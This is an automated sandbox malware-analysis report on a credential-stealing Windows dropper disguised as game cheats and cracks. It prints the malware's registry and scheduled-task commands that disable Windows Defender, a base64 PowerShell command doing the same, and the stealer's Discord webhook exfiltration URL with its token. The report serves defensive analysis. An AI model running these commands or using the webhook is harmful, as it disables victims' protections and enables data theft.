Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
wKj1CBkbos.exe

Overview

General Information

Sample name:wKj1CBkbos.exe
renamed because original name is a hash value
Original sample name:E3A480A53D8B2C398A7642E1F4E84785.exe
Analysis ID:1545326
MD5:e3a480a53d8b2c398a7642e1f4e84785
SHA1:7f8fa5e3dc9be9055f9202213be33460a1af1e09
SHA256:11e550c201ee70fb01902b1e84b19a133c0861e170c764db9d8755be67fdcde2
Tags:DCRatexeuser-abuse_ch
Infos:

Detection

Blank Grabber, Umbral Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Blank Grabber
Yara detected Umbral Stealer
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Creates files with lurking names (e.g. Crack.exe)
Detected VMProtect packer
Disable Windows Defender real time protection (registry)
Disables Windows Defender (deletes autostart)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Sigma detected: Disable Important Scheduled Task
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to evade analysis by execution special instruction (VM detection)
Uses cmd line tools excessively to alter registry or file data
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Too many similar processes found
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wKj1CBkbos.exe (PID: 5280 cmdline: "C:\Users\user\Desktop\wKj1CBkbos.exe" MD5: E3A480A53D8B2C398A7642E1F4E84785)
    • 52cheatand52rat.exe (PID: 4420 cmdline: "C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe" MD5: 06129FFC46E854930CFCAA754CA1D487)
      • WMIC.exe (PID: 5164 cmdline: "wmic.exe" csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • conhost.exe (PID: 2304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Primordial Crack.exe (PID: 7152 cmdline: "C:\Users\user\AppData\Local\Temp\Primordial Crack.exe" MD5: BBD6FFDB33259778F08704696A04891F)
      • Lunch LaCheatV2.exe (PID: 4788 cmdline: "C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe" MD5: 7DB5128F7A81CC1AF094D8898E79FF21)
      • cmd.exe (PID: 2976 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\windows defender.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 3192 cmdline: reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • reg.exe (PID: 5532 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • reg.exe (PID: 3220 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • reg.exe (PID: 6548 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Mpuser" /v "MpEnablePus" /t REG_DWORD /d "0" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • reg.exe (PID: 5668 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • reg.exe (PID: 2848 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • reg.exe (PID: 5676 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • reg.exe (PID: 4016 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • reg.exe (PID: 7020 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • reg.exe (PID: 3476 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • reg.exe (PID: 6824 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • reg.exe (PID: 3756 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • reg.exe (PID: 988 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • reg.exe (PID: 3704 cmdline: reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
    • cmd.exe (PID: 5704 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\windows defender.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • reg.exe (PID: 6368 cmdline: reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 6568 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 4460 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 5172 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Mpuser" /v "MpEnablePus" /t REG_DWORD /d "0" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 5956 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 5724 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 4180 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 6452 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 2144 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 2992 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 6596 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 5340 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 2120 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 3796 cmdline: reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 2732 cmdline: reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • schtasks.exe (PID: 2100 cmdline: schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable MD5: 48C2FE20575769DE916F48EF0676A965)
      • schtasks.exe (PID: 3192 cmdline: schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable MD5: 48C2FE20575769DE916F48EF0676A965)
      • schtasks.exe (PID: 5532 cmdline: schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable MD5: 48C2FE20575769DE916F48EF0676A965)
      • schtasks.exe (PID: 5724 cmdline: schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable MD5: 48C2FE20575769DE916F48EF0676A965)
      • schtasks.exe (PID: 5608 cmdline: schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable MD5: 48C2FE20575769DE916F48EF0676A965)
  • cleanup

Malware Configuration

Threatname: Umbral Stealer

{"C2 url": "https://discord.com/api/webhooks/1266665187293794356/BgUJDQi9QXAA0avjRcAiy-uTUWdbVUSk8SQjon--JNjDxPP5bEhE6DLfJFghJ_KLSRhA ", "Version": "v1.3"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
wKj1CBkbos.exeJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
    wKj1CBkbos.exeJoeSecurity_UmbralStealerYara detected Umbral StealerJoe Security
      wKj1CBkbos.exeINDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDeviceDetects executables attemping to enumerate video devices using WMIditekSHen
      • 0x33df4:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
      • 0x33f7a:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
      • 0x34016:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
        C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeJoeSecurity_UmbralStealerYara detected Umbral StealerJoe Security
          C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeINDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDeviceDetects executables attemping to enumerate video devices using WMIditekSHen
          • 0x31888:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
          • 0x31a0e:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
          • 0x31aaa:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          00000002.00000000.2138750584.000001BC02442000.00000002.00000001.01000000.00000005.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
            00000002.00000000.2138750584.000001BC02442000.00000002.00000001.01000000.00000005.sdmpJoeSecurity_UmbralStealerYara detected Umbral StealerJoe Security
              00000000.00000003.2138916990.00000000013AC000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
                00000000.00000003.2138916990.00000000013AC000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UmbralStealerYara detected Umbral StealerJoe Security
                  00000000.00000000.2133151338.0000000000408000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
                    Click to see the 7 entries

                    Unpacked PEs

                    SourceRuleDescriptionAuthorStrings
                    2.0.52cheatand52rat.exe.1bc02440000.0.unpackJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
                      2.0.52cheatand52rat.exe.1bc02440000.0.unpackJoeSecurity_UmbralStealerYara detected Umbral StealerJoe Security
                        2.0.52cheatand52rat.exe.1bc02440000.0.unpackINDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDeviceDetects executables attemping to enumerate video devices using WMIditekSHen
                        • 0x31888:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
                        • 0x31a0e:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
                        • 0x31aaa:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
                        0.3.wKj1CBkbos.exe.13e55f0.0.unpackJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
                          0.3.wKj1CBkbos.exe.13e55f0.0.unpackJoeSecurity_UmbralStealerYara detected Umbral StealerJoe Security
                            Click to see the 13 entries

                            Sigma Signatures

                            System Summary

                            barindex
                            Sigma detected: Disable Important Scheduled Task
                            Source: Process startedAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: Command: schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable, CommandLine: schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\windows defender.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5704, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable, ProcessId: 2100, ProcessName: schtasks.exe

                            Suricata Signatures

                            No Suricata rule has matched

                            Joe Sandbox Signatures

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Antivirus / Scanner detection for submitted sample
                            Source: wKj1CBkbos.exeAvira: detected
                            Antivirus detection for dropped file
                            Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeAvira: detection malicious, Label: HEUR/AGEN.1307507
                            Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                            Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                            Found malware configuration
                            Source: wKj1CBkbos.exeMalware Configuration Extractor: Umbral Stealer {"C2 url": "https://discord.com/api/webhooks/1266665187293794356/BgUJDQi9QXAA0avjRcAiy-uTUWdbVUSk8SQjon--JNjDxPP5bEhE6DLfJFghJ_KLSRhA ", "Version": "v1.3"}
                            Multi AV Scanner detection for dropped file
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeReversingLabs: Detection: 84%
                            Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeReversingLabs: Detection: 83%
                            Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeReversingLabs: Detection: 75%
                            Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exeReversingLabs: Detection: 92%
                            Multi AV Scanner detection for submitted file
                            Source: wKj1CBkbos.exeReversingLabs: Detection: 95%
                            Machine Learning detection for dropped file
                            Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeJoe Sandbox ML: detected
                            Machine Learning detection for sample
                            Source: wKj1CBkbos.exeJoe Sandbox ML: detected
                            Source: wKj1CBkbos.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

                            Networking

                            barindex
                            C2 URLs / IPs found in malware configuration
                            Source: Malware configuration extractorURLs: https://discord.com/api/webhooks/1266665187293794356/BgUJDQi9QXAA0avjRcAiy-uTUWdbVUSk8SQjon--JNjDxPP5bEhE6DLfJFghJ_KLSRhA
                            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                            Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                            Source: Joe Sandbox ViewASN Name: TUT-ASUS TUT-ASUS
                            Source: unknownDNS query: name: ip-api.com
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                            Source: global trafficDNS traffic detected: DNS query: ip-api.com
                            Source: 52cheatand52rat.exe, 00000002.00000002.2218560821.000001BC1CA1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                            Source: 52cheatand52rat.exe, 00000002.00000002.2211105110.000001BC043AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gstatic.com
                            Source: 52cheatand52rat.exe, 00000002.00000002.2211105110.000001BC04409000.00000004.00000800.00020000.00000000.sdmp, 52cheatand52rat.exe, 00000002.00000002.2211105110.000001BC043F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                            Source: wKj1CBkbos.exe, 52cheatand52rat.exe.0.drString found in binary or memory: http://ip-api.com/json/?fields=225545
                            Source: 52cheatand52rat.exe, 00000002.00000002.2211105110.000001BC043F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                            Source: wKj1CBkbos.exe, 52cheatand52rat.exe.0.drString found in binary or memory: http://ip-api.com/line/?fields=hostingI7AB5C494-39F5-4941-9163-47F54D6D5016I032E02B4-0499-05C3-0806-
                            Source: 52cheatand52rat.exe, 00000002.00000002.2211105110.000001BC0437E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                            Source: 52cheatand52rat.exe.0.drString found in binary or memory: https://discord.com/api/v10/users/
                            Source: 52cheatand52rat.exe, 00000002.00000002.2211105110.000001BC04301000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1266665187293794356/BgUJDQi9QXAA0avjRcAiy-uTUWdbVUSk8SQjon--JNjDxPP
                            Source: wKj1CBkbos.exe, 52cheatand52rat.exe.0.drString found in binary or memory: https://discordapp.com/api/v9/users/
                            Source: 52cheatand52rat.exe.0.drString found in binary or memory: https://github.com/Blank-c/Umbral-Stealer
                            Source: 52cheatand52rat.exe, 00000002.00000002.2211105110.000001BC043A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gstatic.com
                            Source: 52cheatand52rat.exe, 00000002.00000002.2211105110.000001BC04301000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gstatic.com/generate_204
                            Source: wKj1CBkbos.exe, 52cheatand52rat.exe.0.drString found in binary or memory: https://gstatic.com/generate_204e==================Umbral
                            Source: reg.exeProcess created: 67

                            System Summary

                            barindex
                            Malicious sample detected (through community Yara rule)
                            Source: wKj1CBkbos.exe, type: SAMPLEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                            Source: 2.0.52cheatand52rat.exe.1bc02440000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                            Source: 0.3.wKj1CBkbos.exe.13e55f0.0.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                            Source: 0.0.wKj1CBkbos.exe.40936c.1.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                            Source: 0.3.wKj1CBkbos.exe.13e55f0.1.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                            Source: 0.3.wKj1CBkbos.exe.13e55f0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                            Source: 0.0.wKj1CBkbos.exe.40936c.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe, type: DROPPEDMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                            Creates files with lurking names (e.g. Crack.exe)
                            Source: C:\Users\user\Desktop\wKj1CBkbos.exeFile created: C:\Users\user\AppData\Local\Temp\Primordial Crack.exeJump to behavior
                            Detected VMProtect packer
                            Source: Lunch LaCheat.exe.6.drStatic PE information: .vmp0 and .vmp1 section names
                            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe 10D28E18A7DF4B2C30E05E5E361F1724E0B6EA8C021D8105EE30354BE79B98D1
                            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe AFE91FEA04D39DE5710AD065252D13B9DF7B7BD25788DDF5AFB162A2F0A03296
                            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe 2952FA4AB9BC3E2B04B1F3AB6B648D0D23FA74856C50BF21FB13FDDFE9A874BB
                            Source: wKj1CBkbos.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: wKj1CBkbos.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                            Source: Primordial Crack.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                            Source: wKj1CBkbos.exe, 00000000.00000002.2187239818.000000000141E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs wKj1CBkbos.exe
                            Source: wKj1CBkbos.exe, 00000000.00000003.2143205509.000000000141E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs wKj1CBkbos.exe
                            Source: wKj1CBkbos.exe, 00000000.00000003.2138916990.0000000001432000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs wKj1CBkbos.exe
                            Source: wKj1CBkbos.exe, 00000000.00000003.2143205509.00000000013E5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs wKj1CBkbos.exe
                            Source: wKj1CBkbos.exe, 00000000.00000003.2138916990.00000000013AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs wKj1CBkbos.exe
                            Source: wKj1CBkbos.exeBinary or memory string: OriginalFilename vs wKj1CBkbos.exe
                            Source: wKj1CBkbos.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
                            Source: wKj1CBkbos.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                            Source: 2.0.52cheatand52rat.exe.1bc02440000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                            Source: 0.3.wKj1CBkbos.exe.13e55f0.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                            Source: 0.0.wKj1CBkbos.exe.40936c.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                            Source: 0.3.wKj1CBkbos.exe.13e55f0.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                            Source: 0.3.wKj1CBkbos.exe.13e55f0.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                            Source: 0.0.wKj1CBkbos.exe.40936c.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                            Source: 52cheatand52rat.exe.0.dr, --------.csBase64 encoded string: 'U2V0LU1wUHJlZmVyZW5jZSAtRGlzYWJsZUludHJ1c2lvblByZXZlbnRpb25TeXN0ZW0gJHRydWUgLURpc2FibGVJT0FWUHJvdGVjdGlvbiAkdHJ1ZSAtRGlzYWJsZVJlYWx0aW1lTW9uaXRvcmluZyAkdHJ1ZSAtRGlzYWJsZVNjcmlwdFNjYW5uaW5nICR0cnVlIC1FbmFibGVDb250cm9sbGVkRm9sZGVyQWNjZXNzIERpc2FibGVkIC1FbmFibGVOZXR3b3JrUHJvdGVjdGlvbiBBdWRpdE1vZGUgLUZvcmNlIC1NQVBTUmVwb3J0aW5nIERpc2FibGVkIC1TdWJtaXRTYW1wbGVzQ29uc2VudCBOZXZlclNlbmQgJiYgcG93ZXJzaGVsbCBTZXQtTXBQcmVmZXJlbmNlIC1TdWJtaXRTYW1wbGVzQ29uc2VudCAy'
